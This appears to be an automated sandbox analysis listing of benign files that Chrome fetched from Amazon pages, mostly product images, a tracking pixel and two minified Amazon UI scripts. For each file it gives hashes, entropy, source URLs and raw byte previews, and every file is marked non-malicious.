                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):81490
                                                                                                                                                                                                                                                                Entropy (8bit):7.8807575810860895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:4/gPkWhnjNjfqfoEB5wxVHfSVxUkevKZ0oietioXGpQBjFVDEbn:4/gPLnjhzE8sVxyvQ0oBtioXDBjFon
                                                                                                                                                                                                                                                                MD5:5157474C81813C728DEB1AF9FCE0942D
                                                                                                                                                                                                                                                                SHA1:F5A1CE5823CC1C81DA1E7AA543E01D95AF33148A
                                                                                                                                                                                                                                                                SHA-256:380EE7606C2D3F001739629BB6443F7C43E02E2FABEFC6D1BA1E9B6774419BED
                                                                                                                                                                                                                                                                SHA-512:61297E7C38D3CADB6D77CD7C2ECB8160588D56FFF75C574497FCD2973A9A155393D48D5F0B8866128FB13D2F15E6FE881B485C67E0C9BF65CBBE9E6BAA851211
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61Lc5g66DAL._SX1500_.jpg
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4035
                                                                                                                                                                                                                                                                Entropy (8bit):7.887791855059402
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TnzkqGK9tMl3lLlCvzzJl/pl8L4RMU3HacdXkj1sx/Zwq1jU2tB1:HkqGKXuK5lhOA3HRtMU/+q1X
                                                                                                                                                                                                                                                                MD5:36630394D0976668EDE4013364A43CD0
                                                                                                                                                                                                                                                                SHA1:0A2772D8C9AFE96DFAE6BA9AC1FC6AC54C08C014
                                                                                                                                                                                                                                                                SHA-256:E3107CD4F9FC9366CF5B47E98F6B75067D8534B331AAE47EEB85847CDEFD28CE
                                                                                                                                                                                                                                                                SHA-512:FD8CF0579F6AB0E88783861CC8E540EA3385284E080129950CBCA46E6406CD894E34AC404341BD7A05FA88EB49C7E8E5EE8A7EF3D843FF727CB69C34D3C7ABC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51zgrgugoJL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!12A..."Qq.....#BRSab.....3Cs...$Tr.%5D.cd..................................................!.12QR..3Aq"#.............?..-......$..+.n'.8Ei...h...L...t...B...MuYN.q.C..*........Y=.z.{....U....eG...o.9.o.W..._..ck..z..Oa...{....>..s...ck..z....W..^....}..PK...S...o.9...W....]....}.A..C.*...C.)........W.+..z..W.+..z.<'.we8G...q....6.].............]#........N8<}.0....9d....u_.....p.a....)........E.t:O}.{....Z....)WI.....L....9..G...u.j.f DE.............'.=..O>..X.4.Ax*.V6..;.]....A.......:..l....i.J......qv].....:4W..mX.y:..m}..m....!......V...{K.ld..q..Z.8A%..+]..F.......k.H&..G#HsHu.....^..=..`9..A.$....K.<N&z.s.?l..sn..b.5..`CAZ.FpNxi.r..=.u.6.`...9..,.o.=..6...*3\.....N.k&:......R.2P...n......0).x.1......S....4..1.o.{Z......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 277x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):18491
                                                                                                                                                                                                                                                                Entropy (8bit):7.96254082348555
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:FkE9dKhFzwONu+p0nDoaCxupkiY/UjvRkg/u:F6hFzwIHunDoFxupD2CvRxG
                                                                                                                                                                                                                                                                MD5:CDCDB63B36958755B17AA1135AB35044
                                                                                                                                                                                                                                                                SHA1:A24D4B5682600488141A9CE75140F331891AEEE1
                                                                                                                                                                                                                                                                SHA-256:115D7FA737C771E1A7B6C89CA831F732907B5C1549E80D22CF1BD09D853CEFD1
                                                                                                                                                                                                                                                                SHA-512:3A1B08ADD31B07320436E8943F01E8FFF8B8259A160F8C72B00406515A399E0C321B31C00A7D4A948B6E13F097C7A0DE95C1F74550D9C5FE459CE22102199D2F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................?A.^?S...HF.3......^.....8......7/C.a.z.)....%Q.....gRra...J.....>^...._Q9X7..N...UF^..o..*.{.........^..\!3..g..>.{..L~..E^K{Lx....gs.fD.f...B...U..(.Z.P..n.&<n..u...o..Q...,.w..........A]|..}.1.v.\.D..~.r.oF...1.........T....;..^...g..n@..k.L..z].0...~...w......C. ..<.G..&.......@\0n .......~.R..............N.......w..........A4.'^.....j..f.5..8.SH.j...1.Z.`.}m...F...g....u.......2..N..S.j..._~...Lz...l)...V.....i...\zi...k3.=..1F...A.U.6.-.?..-....d.K...z.......h..y...v.6.(...41..........y.D :.w.87%w...Z,.......O.l.u.P...j......-..|..p..f.C.4.\....iI..m-.xV..f0x..Y.L.j.^.2T8..y.FR.S..t.8m'.kOO_.....t..~.dg_;Q.Hm..K..........O.+...i3..X...`...J...8v...P......B..7. ..+3z....s.......e.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1747
                                                                                                                                                                                                                                                                Entropy (8bit):7.319021307352595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6YmDoPHULh4io+QrTrZIwX0J6TNi5gi+h:TQYk0eizGTrJ02i5giE
                                                                                                                                                                                                                                                                MD5:2067313B03F9CDBA065DD9BC150A5F1C
                                                                                                                                                                                                                                                                SHA1:E744B11069A7F7C52C68F19D1EC1C6DDC9D3D842
                                                                                                                                                                                                                                                                SHA-256:B0581F5C40A58668563495C5E94071B0A0B81D22A8C8275760E08B53E1665CCB
                                                                                                                                                                                                                                                                SHA-512:51B50F54F8319F394A39AEC1CDA543CFDC688304800436245D45DC2DE1CD7A8C51B2E7D0315964641B40798710EA20DEFD1AB55652CCA42204D5D8D7A9614F8C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_toys-bau-qc-2322-372x232-b09rpsq7r3_372x232_ae-en._SY116_CB627396617_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!1A.."2aqQR....Bbcr.s.................................................!..1a.A.234Qr.q............?...............o..._S..%._.}]..9<.I6..t..|.R.U..v.Z..m..GM..$hg...4.KZ.J.m...j_bE........V.4.n..?*l...mO...)QQ.K}..Z.SvM.K.l.'..UV..1..;.jR.Wn.\rf..e.-.N.....;...u.......l|.U{...4...~.Kn:6.D.qs.*..bb=.1].4..i...A.....................-y'g....c.M.V...2J..]...-..QT:.ekEeY........f.J.</....qjI5....9...G[..T.7...................................<.Q.B..Q.R..M....&..d..I[M....}/.....f.T.Rr.q...;GJ....E..n1o.....z..<.}...UG.k.0.t..........................x{.%O.(...E..:i.$..Q.C....y......................................e|.......E..7..R.Ri3*....."q.^y...G/......pj....................(...\/.|Y..JO.7.ui.U.....9..-N.F.S0}....%.1.........4..O.Z.#.M'
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11291
                                                                                                                                                                                                                                                                Entropy (8bit):7.961861300669779
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:sFBw7daWfmTr+4nT7yT7dvrMTfvpwzeOQaFaQnTVU25znHDklj/0PybL8MlcZ31:+BwEnhy3ZIfGzecQp2n4FL8Mlo1
                                                                                                                                                                                                                                                                MD5:D0D62A9ADBBDBEC3187D9ECA0C1E82BD
                                                                                                                                                                                                                                                                SHA1:A2EF5EC78C30B42C85E07A117E97CCC5288DC2B4
                                                                                                                                                                                                                                                                SHA-256:C6465B96506B4C1B3C83484FEAF18DA4EC6AAFA1B197FD296F6CD67F5F118D20
                                                                                                                                                                                                                                                                SHA-512:854A0B0E7FEE0AD92D02967CFC97BFB670F63BF1EA917CEAA7DEBFEC1E1BD0A4FA0C95EB4D21C009D4E9681E8EDF8B0C3C07713105AC63B0C1DD5DB472E575B9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81NQOGJKvkL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..."1A.2Q.#Ra..T..$36qr...45Ct...b..Ss...................................................!.1..Q.."2ARa...#q.............?..th.i|.4h....<r.Q...7:.<0.w.....@hY.f..Y{H..?PH..F..Z...W.[/S.W........jz.Qd..T.#.. ....T...au...-;.@.sY........d .d_..;.I.t.3P.wZ....?f...v.K.d....[.c./Nx....#7=..L*6....N.....@......s...c.....R..(v`....~F..R\\]>a...5{x.7.....u\...v.Y.K<,.O.`..v...S.....T..t..j.<..!M.r.......HIO..F^..SW...^...z....1.6...._N...s......&..5.C....U............w*G....?s.wB\!bC.....U....;.O....w_..$. .H#...j..GP......"WTU...D.%J'x#.. C._W.V...\...'.2<..4h.#F...........n>...W....m<}G.u.l4......Q)a|....O.<...5u\".....q.!$va.-..&...k^.,.....\._....L.?J..(N...Q*...Ps...!.K.u>.......A.4D~..~.,....Q..t]=..rT(w.v......<...p.W.#..A.0$.A#VF...P
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (549)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7425
                                                                                                                                                                                                                                                                Entropy (8bit):5.2787148447911
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:zzgiblv5U7AVY6YUXSwaAlfrrTJjKkMcT8LgrX5/ERnoCEjaUMUE0jHkqjC:zzgixv5UEVSwaczlQcNrXcoNJMfl
                                                                                                                                                                                                                                                                MD5:AE6317F339A27F5E79C515A61000C0C7
                                                                                                                                                                                                                                                                SHA1:ACB659ED1C4EA996C6BF3B131433BA8F5B0AC31E
                                                                                                                                                                                                                                                                SHA-256:CF152C7FCEF16508BF068E50980C60F9EE31E0FC4146D6FBB54E1A37E8332ACC
                                                                                                                                                                                                                                                                SHA-512:9DFB95E211E2D1A184D61B6A11FCD9CF126AF03461399182F900506B532EFF70CA2218037EB291D81E9E759C2C3C3B2A1D7451E79A979D97AB190BA14D80FF24
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(h){var d=window.AmazonUIPageJS||window.P,m=d._namespace||d.attributeErrors,a=m?m("CheckoutCartPrefetchAsset",""):d;a.guardFatal?a.guardFatal(h)(a,window):a.execute(function(){h(a,window)})})(function(h,d,m){h.when("A","CartServerSetting","CartCheckoutPrefetch-DeviceAgnosticFunctions").register("CartCheckoutPrefetchDesktop",function(a,p,g){function k(){return"/gp/buy/prefetch/store-html.html"}function f(a){a="/gp/cart/checkout-prefetch.html?cartInitiateId\x3d"+a;var b=g.getBuyBoxParameters(v),.l;for(l in b)b.hasOwnProperty(l)&&(a+="\x26"+l+"\x3d"+encodeURIComponent(b[l]));return a}function b(){if(q)if(g.isTangoPreinitiateEligible())t=!1,g.javaCheckoutPreinitiate();else{t=!0;var a=(new Date).getTime(),b=f(a);g.streamJSONPrefetchRequest(b,"PreInitiate:",g.executionIdSuccessHandler,a);g.insertValueInBuyBox("cartInitiateId",a)}else a=(new Date).getTime(),b=f(a),g.streamJSONPrefetchRequest(b,"PreInitiate:",g.executionIdSuccessHandler,a),g.insertValueInBuyBox("cartInitiateId",a)}fun
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10686
                                                                                                                                                                                                                                                                Entropy (8bit):7.952739433473174
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:x2YfiwfZdBCXlQnFbmCjsnc5HzbhGBtHN1cJC4EJNZ502Y1fqqlQMmP0:x2y9ZdcyYCjsc5TCN1cJC4EJNZY1qM1
                                                                                                                                                                                                                                                                MD5:05D3976131DDD36B2F5E1E5991A21AFC
                                                                                                                                                                                                                                                                SHA1:C2D257D568BFFBA36EEDEFE74EBE92B2A1280908
                                                                                                                                                                                                                                                                SHA-256:55ED80112347C554728CEAB3B673CC43AA29C8F6B264465A692A736E80DCD56C
                                                                                                                                                                                                                                                                SHA-512:79285166C08323F71189D3FA7F2CE78A35351490206B93238CF7C6A5BB6A3546C6A164A20BDACDA40CEE6918BC19CAF0C74EBC70C629A2FB3BCD34E4EE6C6429
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61zol3DlpeL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."A.Q#2aq....3Brt...$5R..%4eu................................................!1..."AQa.2q.....#.....$3B...............?..t.).JR...).TW\z.......p..K#.DF.@...z..........=Q...Q.=N...W8.p.e.?.B......?t.....{.]:._.C.. ...=Tu.T.;..O.........X..8...{:....-..._]k.Kq.....{.-....=.....P..Eq.].....)*......N.6.+$.C..]..%F...>.....gir.....&...M-..id.M...4..NG........`..fz.".%...J.,.....^..N.. 2G$..D.....;.G.&.zF.T....]:l0....OF..:.&.\..~.}..T.(.|G8.O..t.^......)J.<.)H.R...)H.R...)H.R...$.".v.~...]E.%-..h..."wi=.P~v......F......e....5.."{W.N!(....N...!yc.....fe. y VN.=%..;....3..N..+...$..V....+....I..1.YO+..x5....h.I&............!Y.%..c/`qU..f.5.N..-O$`..t....k..,./.b..I....`.....q.R...m.:xK2A...w...n.D...M....o8RMK:.'..mv.q.,..E...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6777
                                                                                                                                                                                                                                                                Entropy (8bit):7.945539203744725
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TlGRY6R2dDo/4Gb07cdJvOy1kvDLQTlwx7yQSk+IT4djyNgMew7wu/qW8MpJ3:xJa/HPltkbLQ5G7QkpTmse4wScql
                                                                                                                                                                                                                                                                MD5:6071F3FC2CF314C36E3726C7B0DF5765
                                                                                                                                                                                                                                                                SHA1:A6FD9815A35FD06A157AA20F8968617E841CE0B1
                                                                                                                                                                                                                                                                SHA-256:BDFFE9F3BB89A742F1546A515CEEDFE315A1A36B8B295537F755F7EEE539F595
                                                                                                                                                                                                                                                                SHA-512:F354305D52200636F4FF4A1C4E1766DFB0D14C5F85016F2F1DFF62B8B7B27CAB4AAFE9DBD08314C0167748B8B4A6F2A0EAE454351D907BEAFE2BA7173FC20B88
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61m4NR7APqL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1R...."2ACQVq......#a....Tb...$346Bt..................................................!1Rq.AQ..2a...$3B..............?..\Q.E.GP.S.....^j..~..T.2(1..p.z.t.:.4..-{#.NZ.G..E~. ....~..Z.G...)@9k..Jr.>....d}).^..R.......-{#.J.B.."T.I...........9k..J..P.Z.G...)@9k..J..cU...EdTZ....j..=.5..E.{..H...c.5.....g.....[..8.{.yE...2t........{d.D..i...M3!.H..B..VH8J.0.I....+#.v...oW7.......:x..l....d:u....|gj...?...{........h=.~._....'.%....Fd:u)........<gj...?..sx..l..........:fC.Q...Jg.v...oO.......\....'.%...h=.~._....fC.R.N........._.......zJ..;.U....Z.....O.K....{d.D..3!..N.....T.W.o....8.........\....'.%...h=.~._....fC.R..{.......v...oW7.......:x..l....d:u......G.p......Y..F./....vv.yY.Dj..4..?Q/.X7.l1l..../.L.t.3!...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2599
                                                                                                                                                                                                                                                                Entropy (8bit):7.4797659436131365
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0ra1UQDbZ/3rk+X4+PxeJb0zr2urG9gtjJA6pKnGvzvucj2:TuKZ/7k+X4yeOzKmARnGs
                                                                                                                                                                                                                                                                MD5:91799B048794C7648425963CD57D0F15
                                                                                                                                                                                                                                                                SHA1:27339F1115632EDCC144D099BFBF7FC32C57420E
                                                                                                                                                                                                                                                                SHA-256:8FDE50FF2908EBDB8D7EE4983578E16CB17E049F75C0CD82B0ED588285098722
                                                                                                                                                                                                                                                                SHA-512:D3E22165C37A033EC0E3122570EF6FF141765F559F35C5278257F6274596ABF490E5493213D378A693E3B2C51FFB07E1AB6FAA4BCC590C3EE7779B341E7E76C9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..3Aq."2Qars..4B....#R...6Sdt..................................................1.".!2.34B............?............../n.gB..OF.')xA93@6.].........WB. ....zR...c-..V..........>1...}.t..jW..v.W.au.J.X...9.}.RH...n..5M..b...B@............................A..h...V...8.y...,....})t...z..a.]u.......zS4.ij*.U:|.........^..K.{O.R.....k...-&..qF~*.R...v....k.T,.o7.Wx.:..............................ys[.....S:.S.....l.t.R....H....t.....w.c...N.S..[.^.g...Vt..r.p......DX.,..h.....i:..No....<....v^:..kuB.....oW1.V.c~.....V..........P..........................rzeJ.N.<.Uk..{).6...5..z...r.;.T....J{.I../..^.cNJ..i.8.Xhz..9Vt.=.......o.l.-...q.A.r........{.N4Ri3..m...C.".../...Z..J..kSq|.......5.SMJ./{.q..KS..w.nTgM..%...L.6....$[.W...tO...Q.z..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):676
                                                                                                                                                                                                                                                                Entropy (8bit):5.171714767992367
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:2BZ/eqKDQM3ShtD34Z9DkkM8uN6FQQJewqDEZ6R8UNIkMVFLJl:2BZ/e3DZ3ShtDoZyaiIQQJixNITVFLJl
                                                                                                                                                                                                                                                                MD5:6E933965CAFAEC4DEFB36AB5E2AAD9A8
                                                                                                                                                                                                                                                                SHA1:8C240969FD002A6679BA28D10DB97280B8D16158
                                                                                                                                                                                                                                                                SHA-256:CA0541D6E2197B0686598AF9F0A2F55643E1451B1375AA2B9650169BC2E76521
                                                                                                                                                                                                                                                                SHA-512:B49F06AE8D0F77CB63167A62C5D9C5AF78D3C4B821F73CDF2A68C28E2F90A8CC68143AE483CD8598C525B7E4F05A33B3EA5D5077F72913ADAE69ADC30CA881A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS
                                                                                                                                                                                                                                                                Preview:(function(e){var d=window.AmazonUIPageJS||window.P,f=d._namespace||d.attributeErrors,a=f?f("GenericObservableJS",""):d;a.guardFatal?a.guardFatal(e)(a,window):a.execute(function(){e(a,window)})})(function(e,d,f){e.register("generic-observable",function(){return function(){var a=this,g={};a.addObserver=function(b,a){g[b]=g[b]||[];g[b].push(a)};a.removeObserver=function(b,a){b=g[b]||[];for(var c=0;c<b.length;)b[c]===a?b.splice(c,1):c++};a.notifyObservers=function(){for(var b=arguments[0],d=[],c=0;c<.arguments.length;c++)d.push(arguments[c]);b=(g[b]||[]).slice(0);for(c=0;c<b.length;c++){var f=b[c];try{f.apply(a,d)}catch(h){e.execute(function(){throw h;})}}};return a}})});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13780
                                                                                                                                                                                                                                                                Entropy (8bit):7.971724921889833
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:hYKZqmh9NTMkBgnyzx4DyNzJI6SXvbrtAR31641:hYxmDNTduW448HtADT1
                                                                                                                                                                                                                                                                MD5:4E9D2B0ED203CDA876CCE77DCABE7DB2
                                                                                                                                                                                                                                                                SHA1:B15510E6744FD3BD115E790A37933B9E45510F46
                                                                                                                                                                                                                                                                SHA-256:24F0CAF5FFCC4F2DE6FDA3B585BEDE0D8DE8FEF3FDF0076C1A136BA88128716F
                                                                                                                                                                                                                                                                SHA-512:3DE0CF9130551B89A7141AE5B43F18A81E1B55CFEEEB0580857389BE86148EBF7BA7F013DE201935529E9D1070EF6436C686AB7570A63813DB8D21B4C5E9B721
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/91+aaxyLapL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."A#2Qa..qBR....C..$3brs........%4U..D..................................................!1..AQ.."aq..#2B......$4b..R............?..zZZZ.E....[~...R7(r..$......tA....).F4f.3?...Fu.pA.........1.@.0.qH..c.w.....e...a..3..|I....Y.~..Q....$Li^1...M...n.&..F.. ....._.Y8Yy.....SH..>b.;7..5..oO.@."2)..3..z.2L..n...o..Y.l.=..W:.....q2y.l.m.G.-.....,XV...`...+'.u.N..,{...q...R....Kn$..m^..Uu..S.$.1.`..Q/....I..H..h.`.....'_G.z.UA.~io..T.......?`N.d...l. ...>.E.O.\.WYM..o_..{.^y...I.i5C~!<N.X...!.04V.....}O.Y.8L.{$...)j..b>@.~.....7..=Gt.7.t9.a....J.q$..p..../........$.We~+9.+4._......T..6=...r...&....N.y7..!.F....].._.......<O6.d'u..bAT7.....h<o.....#..V-...,\......;.........~$...wa%C.PF...r_....j..d1O.n.TVF..Xn...g....#.I.h=0OnO
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6057
                                                                                                                                                                                                                                                                Entropy (8bit):7.905647149495341
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tr469lRA4LeP1E05L0ObSJXX2ClUz60c/mutPP0BidFZ2Z5EIenACf2Uuty:n469ktQru60nutPP0U6EU+
                                                                                                                                                                                                                                                                MD5:319BC0474CACFA7129876AF3A5B0E735
                                                                                                                                                                                                                                                                SHA1:70370BC368E5C94546D0A9DFC8C4C151C495C32C
                                                                                                                                                                                                                                                                SHA-256:0CD55F15AA3C999C3112C97331897F32E4C8E2268D133A6DA6B9A8B56C984C9B
                                                                                                                                                                                                                                                                SHA-512:68706ADFD31432E60712D194EB47C9F7145010039015CC6C60A5CC2A5FC3649C9374614EA57F18CB27D54238AC171202F7769DC85373C92C91A30943A8E22648
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/81LPwvQLXJL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQ."2a..#BRq....$3....STbr......C.......DU......................................................?..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R.k:..iq.}(.......~$.x..,H...X.....b....I.XP......\..?H......o.FQe......J.8..7rB}....zW...._.!..y.H....N.|.$..a...`..W.3U.S..$.N....6.m.....0..0.*k.@.)@.)@.)@.....p......o.,..%t.H.}..FnP....[..1... .E.o.....Rda...w...<.#....`.%.v...SD.}...QO..+.. ...}....e.E........rv.......P"...H..MJ->bZ...\eTE4....q..C|.o.)J.JR.JR.JR.JR.JR.JTk.]..........`<...20.n.Px...R...yn.%Xa.r.;.U..Z!.c.7....&D..1.#p..L.<.0}...^@-......{.Eo.....c....,..h..>..Nl.Zk............><u..$Zq..W.3...].>2R2..c. ... ....j.{.....k....p... ,...*....5. |.).U.]....q..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9592
                                                                                                                                                                                                                                                                Entropy (8bit):7.81047369607546
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:DdOP5Z68CjM4mdtOXnQHYyV3TZAcV+vVUvwr61hAKgosX33+Wboeiq8GtT7Tj:DdOP5Z68CI4oMQ4yVjZAcVVPkBosXnbT
